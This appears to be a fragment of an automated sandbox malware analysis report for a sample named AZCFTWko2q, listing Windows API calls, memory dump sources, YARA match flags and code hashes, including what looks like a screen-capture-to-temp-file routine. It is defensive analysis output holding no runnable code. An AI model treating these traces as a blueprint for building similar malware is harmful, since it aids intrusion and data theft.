                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2016158738-0
                                                                                                                                                                                                                                                                                      • Opcode ID: ff4b281e18efaa19658e03831a8d75929bd5cd68572c305843f6b1aa6eea9166
                                                                                                                                                                                                                                                                                      • Instruction ID: e409c1f6f572afb8e53c6bef185f66c51efc5fed4ad0f11af6fa15d84cefb54f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ff4b281e18efaa19658e03831a8d75929bd5cd68572c305843f6b1aa6eea9166
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 84F022362007045FDB159F3ADC91B6A7B90EF84328F15442EFE028B680D7B5AC028684
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,024F047A,?,00000004), ref: 024F547A
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: InfoLocale
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2299586839-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
                                                                                                                                                                                                                                                                                      • Instruction ID: 54da1688a597f168057d7d3f3419851e5cd8debd37b56572a07c095bfce91af3
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 96F02B31680318BFDB015F51CC01F6E7B66EF44F12F50411AFD0566290DB718D20AACA
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 024EE654: RtlEnterCriticalSection.NTDLL(02070DAF), ref: 024EE663
                                                                                                                                                                                                                                                                                      • EnumSystemLocalesW.KERNEL32(00434D87,00000001,00457BB8,0000000C), ref: 024F506C
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1272433827-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 149a1b447c4ca571c705eb83a82105c6c8b5f7f3924206eb96c0dadbe136b747
                                                                                                                                                                                                                                                                                      • Instruction ID: eb4735233013f534b63ada52e05664a4d822d9e8a6e3a35913ff8f234af06f75
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 149a1b447c4ca571c705eb83a82105c6c8b5f7f3924206eb96c0dadbe136b747
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FBF08C32A10300DFEB10EF69D801B4C77E1AF05722F10416AF900DB2A1C77589448F4A
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 0042E3ED: EnterCriticalSection.KERNEL32(?,?,00431C7A,?,00457A38,00000008,00431D48,?,?,?), ref: 0042E3FC
                                                                                                                                                                                                                                                                                      • EnumSystemLocalesW.KERNEL32(00434D87,00000001,00457BB8,0000000C), ref: 00434E05
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1272433827-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 47d67bb98ae687caab0f152daec36b922070e938420cb95d1256d2dc5184026a
                                                                                                                                                                                                                                                                                      • Instruction ID: 538c22e4eb892f32bc8c86ea5e443232934619ae82977abc573478e901e73d8c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 47d67bb98ae687caab0f152daec36b922070e938420cb95d1256d2dc5184026a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D4F04F32A103009FE710EF69D906B9D77E1AF05726F10416AF910DB2E2CB7999808F49
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F2141: GetLastError.KERNEL32(?,?,024EA9EC,?,00000000,?,024ECDE6,024C247E,00000000,?,00451F20), ref: 024F2145
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F2141: _free.LIBCMT ref: 024F2178
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024F21B9
                                                                                                                                                                                                                                                                                      • EnumSystemLocalesW.KERNEL32(0043B1D9,00000001,?,?,?,024FBCAB,024F0A1C,?,?,?,?,?,024F0A1C,?,?,?), ref: 024FB520
Memory Dump Source
• Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
Yara matches
Similarity
• API ID: ErrorLast$EnumLocalesSystem_free
• String ID:
• API String ID: 2016158738-0
APIs
  • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
  • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
  • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
• EnumSystemLocalesW.KERNEL32(0043B1D9,00000001,?,?,?,0043BA44,004307B5,?,?,?,?,?,004307B5,?,?,?), ref: 0043B2B9
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: ErrorLast$EnumLocalesSystem_free
• String ID:
• API String ID: 2016158738-0
APIs
• SetUnhandledExceptionFilter.KERNEL32(00410672,024CFE60), ref: 024D08D2
Memory Dump Source
• Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
Yara matches
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_00010672,0040FBF9), ref: 0041066B
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: HeapProcess
• String ID:
• API String ID: 54951025-0
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: b270ae943b8fc30b0109646306f9a638257ad0854cfcd7f7143e4a79d383dfca
                                                                                                                                                                                                                                                                                      • Instruction ID: f3b5f5190805b4698d63a461b06847c9acc7f3e95b14f595c6eda227b594814b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b270ae943b8fc30b0109646306f9a638257ad0854cfcd7f7143e4a79d383dfca
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 17D1B3721085A20AEF2D4A39847003BFFE26A521B730D479FD8F7CA6D2EF24D595D660
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                                                                                      • Instruction ID: 997c4b69f28c37e50f38083dcda573743c3324b919311f64d1292b82a7231bc5
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 739133722090A34AFF6E463E847413FFEE15A422A731A079FD4F3CA2D5EF248555DA20
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                                                                                      • Instruction ID: b25d7b7a8e55bbee32d2fc67e28ff16be1cfeba2f71328b5531bdb6c5bdb1bbb
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6491647230D0B34ADB294679953443FFFE15E523A135A07DFE4F2CA2C1EE289964D624
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                                                                                      • Instruction ID: 4a81a6b42763d70d4a8e310c9ec88c84ef7538502e54536037941173bfa84265
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D8912F721090A34AFF69467A857413FFFE19A821A730A079FD4F3CA2E5FF248555D620
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                                                                                      • Instruction ID: 19c93412fb5f9130a8e3bb0cb99d698500333008097130ff6794007c36a41420
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6591943230A0B34EEB294279943403FFFE15A523A135A07DFD4F2CA2C5EE189565E628
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                                                                                      • Instruction ID: d1b306e79952ee1e1caadda0a87fa4a17f8ccbb8b3d07b36cd116e432cf8f8c1
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C8912E722090A34AFF6D463D857453EFEE19A412B730A079FE4F3CA2C5EF249665D620
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                                                                                      • Instruction ID: d2c87871af4d92e544e05363471dd483cf2102058027b34f35735ca62f395a82
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0691937230D0B34ADB2D467AA47403EFFE15A523B139A079FD4F2CB2C1ED18D6659628
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
                                                                                                                                                                                                                                                                                      • Instruction ID: 6fd82bfd921a4e0dfad55dc1dac07c35dcfbd6e2df2d00757058fac3d07aa892
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ED613831E00B04DAFE386A2888517BF639EBF55A4BF04051BE8A3DB3C4D7159986C755
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Memory Dump Source
• Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
Yara matches
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Memory Dump Source
• Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
Yara matches
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Memory Dump Source
• Source File: 00000000.00000002.3895623378.0000000000A39000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A39000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a39000_AZCFTWko2q.jbxd
Yara matches
Memory Dump Source
• Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
Yara matches
APIs
• DefWindowProcW.USER32(?,00000014,?,?), ref: 00402135
• GetClientRect.USER32(?,?), ref: 0040214A
• GetDC.USER32(?), ref: 00402151
• CreateSolidBrush.GDI32(00646464), ref: 00402164
• SelectObject.GDI32(00000000,00000000), ref: 00402178
• CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 00402183
• SelectObject.GDI32(00000000,00000000), ref: 00402191
• Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 004021A4
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 004021AF
• MulDiv.KERNEL32(00000008,00000000), ref: 004021B8
• CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,Tahoma), ref: 004021DC
• SelectObject.GDI32(00000000,00000000), ref: 004021EA
• SetBkMode.GDI32(?,00000001), ref: 00402267
• SetTextColor.GDI32(?,00000000), ref: 00402276
• _wcslen.LIBCMT ref: 0040227F
Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CreateObjectSelect$BrushCapsClientColorDeviceFontModeProcRectRectangleSolidTextWindow_wcslen
                                                                                                                                                                                                                                                                                      • String ID: Tahoma
                                                                                                                                                                                                                                                                                      • API String ID: 3832963559-3580928618
APIs
• DestroyWindow.USER32(?), ref: 004025CD
• DefWindowProcW.USER32(?,00000204,?,?), ref: 004025DF
• ReleaseCapture.USER32 ref: 004025F2
• GetDC.USER32(00000000), ref: 00402619
• CreateCompatibleBitmap.GDI32(?,-0045D5E7,00000001), ref: 004026A0
• CreateCompatibleDC.GDI32(?), ref: 004026A9
• SelectObject.GDI32(00000000,00000000), ref: 004026B3
• BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00CC0020), ref: 004026E1
• ShowWindow.USER32(?,00000000), ref: 004026EA
• GetTempPathW.KERNEL32(00000104,?), ref: 004026FC
• GetTempFileNameW.KERNEL32(?,gya,00000000,?), ref: 00402717
• DeleteFileW.KERNEL32(?), ref: 00402731
• DeleteDC.GDI32(00000000), ref: 00402738
• DeleteObject.GDI32(00000000), ref: 0040273F
• ReleaseDC.USER32(00000000,?), ref: 0040274D
• DestroyWindow.USER32(?), ref: 00402754
• SetCapture.USER32(?), ref: 004027A1
• GetDC.USER32(00000000), ref: 004027D5
• ReleaseDC.USER32(00000000,00000000), ref: 004027EB
• GetKeyState.USER32(0000001B), ref: 004027F8
• DestroyWindow.USER32(?), ref: 0040280D
Strings
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: Window$DeleteDestroyRelease$CaptureCompatibleCreateFileObjectTemp$BitmapNamePathProcSelectShowState
• String ID: gya
• API String ID: 2545303185-1989253062
APIs
Memory Dump Source
• Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
Yara matches
Similarity
• API ID: _free$Info
• String ID:
• API String ID: 2509303402-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: _free$Info
• String ID:
• API String ID: 2509303402-0
APIs
• ___free_lconv_mon.LIBCMT ref: 024FA8A3
  • Part of subcall function 024F9BF2: _free.LIBCMT ref: 024F9C0F
  • Part of subcall function 024F9BF2: _free.LIBCMT ref: 024F9C21
  • Part of subcall function 024F9BF2: _free.LIBCMT ref: 024F9C33
  • Part of subcall function 024F9BF2: _free.LIBCMT ref: 024F9C45
  • Part of subcall function 024F9BF2: _free.LIBCMT ref: 024F9C57
  • Part of subcall function 024F9BF2: _free.LIBCMT ref: 024F9C69
  • Part of subcall function 024F9BF2: _free.LIBCMT ref: 024F9C7B
  • Part of subcall function 024F9BF2: _free.LIBCMT ref: 024F9C8D
  • Part of subcall function 024F9BF2: _free.LIBCMT ref: 024F9C9F
  • Part of subcall function 024F9BF2: _free.LIBCMT ref: 024F9CB1
  • Part of subcall function 024F9BF2: _free.LIBCMT ref: 024F9CC3
  • Part of subcall function 024F9BF2: _free.LIBCMT ref: 024F9CD5
  • Part of subcall function 024F9BF2: _free.LIBCMT ref: 024F9CE7
• _free.LIBCMT ref: 024FA898
  • Part of subcall function 024F36D1: HeapFree.KERNEL32(00000000,00000000,?,024FA35F,?,00000000,?,00000000,?,024FA603,?,00000007,?,?,024FA9F7,?), ref: 024F36E7
  • Part of subcall function 024F36D1: GetLastError.KERNEL32(?,?,024FA35F,?,00000000,?,00000000,?,024FA603,?,00000007,?,?,024FA9F7,?,?), ref: 024F36F9
• _free.LIBCMT ref: 024FA8BA
• _free.LIBCMT ref: 024FA8CF
• _free.LIBCMT ref: 024FA8DA
• _free.LIBCMT ref: 024FA8FC
• _free.LIBCMT ref: 024FA90F
• _free.LIBCMT ref: 024FA91D
• _free.LIBCMT ref: 024FA928
• _free.LIBCMT ref: 024FA960
• _free.LIBCMT ref: 024FA967
• _free.LIBCMT ref: 024FA984
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024FA99C
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 161543041-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                                                                                                                                                                                                      • Instruction ID: e2f8de537a3546ced4701bae047de9727c572679c1f75b14ebf35eb39c9f07e9
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 38319C316002119FEBB0AF7AD880B5BBBE9AF80350F11486FEA49D7750DBB0A850CA14
APIs
• ___free_lconv_mon.LIBCMT ref: 0043A63C
  • Part of subcall function 0043998B: _free.LIBCMT ref: 004399A8
  • Part of subcall function 0043998B: _free.LIBCMT ref: 004399BA
  • Part of subcall function 0043998B: _free.LIBCMT ref: 004399CC
  • Part of subcall function 0043998B: _free.LIBCMT ref: 004399DE
  • Part of subcall function 0043998B: _free.LIBCMT ref: 004399F0
  • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A02
  • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A14
  • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A26
  • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A38
  • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A4A
  • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A5C
  • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A6E
  • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A80
• _free.LIBCMT ref: 0043A631
  • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
  • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
• _free.LIBCMT ref: 0043A653
• _free.LIBCMT ref: 0043A668
• _free.LIBCMT ref: 0043A673
• _free.LIBCMT ref: 0043A695
• _free.LIBCMT ref: 0043A6A8
• _free.LIBCMT ref: 0043A6B6
• _free.LIBCMT ref: 0043A6C1
• _free.LIBCMT ref: 0043A6F9
• _free.LIBCMT ref: 0043A700
• _free.LIBCMT ref: 0043A71D
• _free.LIBCMT ref: 0043A735
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast___free_lconv_mon
• String ID:
• API String ID: 161543041-0
• Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
